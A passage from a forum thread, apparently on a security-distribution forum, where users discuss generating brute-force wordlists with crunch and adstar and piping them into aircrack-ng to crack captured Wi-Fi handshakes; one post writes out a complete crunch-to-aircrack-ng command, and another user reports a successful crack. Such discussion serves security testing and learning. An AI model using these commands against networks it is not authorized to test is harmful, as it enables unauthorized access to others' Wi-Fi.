    Google Crunch A Day With Tape - an excellent tutorial there are two tutorials by this author
    ....

    Publish your work when you are finished.

    MTeams
    Thank you for your genius solution.
    I also found the tutorial what you suggested, and there is the "-d" switch, and I think this is what I need! I will test it today/tomorrow.
    d Limits the number of consecutive identical characters (crunch v3.2)
    I do not have enough room on my hdd to generate such a huge file,(I guess this needs lots of GBs) so I use pipe and send it immediately from crunch to aircrack.
    If you mean to publish the wordlist that crunch generates, then I have to buy a 1TB or 2TB external HDD, then generate the file and upload it to somewhere.

    Thank you and I will give a feedback after the test.

  43. #43
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by backt View Post
    Thank you for your genius solution.
    I also found the tutorial what you suggested, and there is the "-d" switch, and I think this is what I need! I will test it today/tomorrow.
    d Limits the number of consecutive identical characters (crunch v3.2)
    I do not have enough room on my hdd to generate such a huge file,(I guess this needs lots of GBs) so I use pipe and send it immediately from crunch to aircrack.
    If you mean to publish the wordlist that crunch generates, then I have to buy a 1TB or 2TB external HDD, then generate the file and upload it to somewhere.

    Thank you and I will give a feedback after the test.
    Using -d switch is not the solution for me, altough it will not repeat each character more than twice (in my case "-d 2") - after each other - , but it will repeat them, - in the whole 8 character long word - more than twice, which is not good for me.

    This will not give the aaabcdef variation but it will give aabacdef - and that is what I do not want.

    It would be great if crunch can handle repetitions.

    So I could tell to crunch not to repeat each character more than "X" times, in my case do not repeat each character more than 2 times.

  44. #44
    Join Date
    2013-Jul
    Posts
    844
    The author of adstar repzeroworld has written a program similiar to crunch. We have not studied this program. You can find the download in these forums and/or write to repzeroworld directly. The author may have a better ability to manipulate strings then what MTeams has suggested.

  45. #45
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    The author of adstar repzeroworld has written a program similiar to crunch. We have not studied this program. You can find the download in these forums and/or write to repzeroworld directly. The author may have a better ability to manipulate strings then what MTeams has suggested.
    Thanks! This is what I need. Adstar.

    "-r REPEAT_A_CHARACTER
    no. of times to repeat a character,e.g, '-r 2' will
    generate all combination of words INCLUDING words with
    each character being repeated a maximum of 2 times."

    I am gonna test it soon.

  46. Someone Help me , is their any Tool using which i can Filter word according to Their Length. Like from an Wordlist/Dictionary file i want to separate those words whose Length is 8. So how do this ?? how i separate only 8 characters words from Dictionary ??

  47. #47
    Join Date
    2014-Sep
    Posts
    13
    Quote Originally Posted by FurqanHanif View Post
    Someone Help me , is their any Tool using which i can Filter word according to Their Length. Like from an Wordlist/Dictionary file i want to separate those words whose Length is 8. So how do this ?? how i separate only 8 characters words from Dictionary ??
    What if you put them in a calc / excel file and paste every character in a separate cell, then delete all columns after "H" column.
    Then you can filter those rows which has something in cell "A" to "H".

    You can also use formulas to remove character after 8th character.
    http://www.extendoffice.com/document...character.html


    or see this post

    http://hashcat.net/forum/thread-2350.html

  48. #48
    Join Date
    2015-Aug
    Posts
    5
    I am using crunch to try and crack a .cap file. I cannot install pyrit (even though I have an intel cpu, I cannot for the life of me figure out how to integrate open CL and pyrit) so I was wondering what I could do to this to integrate the commonly used Spanish(mexico) characters?

    crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -a 2 -b (target mac address) -w- (output file name).cap

  49. #49
    Join Date
    2015-Aug
    Posts
    11
    Dear All..
    I already started cracking password using - page 1-method. And Successful.
    But my question is that -
    How can we crack a password with Special Characters??
    Hope of your best reply.
    Thanking you.

  50. #50
    Join Date
    2015-Nov
    Posts
    1
    Hi !
    I need your help please ! I would like to know what symbol is between 9 and aircrack-ng . Do you have to specify the cap file ? Like /root/Desktop/handshakefile.cap ? Thanks a lot ! Hope to hear from you soon !

Similar Threads

  1. Aircrack (+) airolib speed
    By YoloSolo in forum General Archive
    Replies: 7
    Last Post: 2018-02-10, 18:23
  2. Aircrack Speed
    By Name Taken in forum NetHunter General Questions
    Replies: 0
    Last Post: 2016-01-23, 04:35

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •